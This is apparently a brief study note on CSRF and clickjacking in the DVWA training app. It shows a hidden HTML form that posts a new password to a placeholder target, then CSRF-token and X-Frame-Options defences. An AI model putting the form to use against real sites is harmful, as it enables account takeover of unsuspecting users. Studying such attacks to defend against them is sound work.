Practical study of CSRF and Clickjacking vulnerabilities, exploitation in DVWA, and countermeasures.
<!-- CSRF exploit -->
<form action="http://target.com/change-password" method="POST">
<input type="hidden" name="password" value="hacked">
</form>
<!-- Defense -->
$token = bin2hex(random_bytes(32));
$_SESSION['csrf_token'] = $token;
Header set X-Frame-Options "DENY"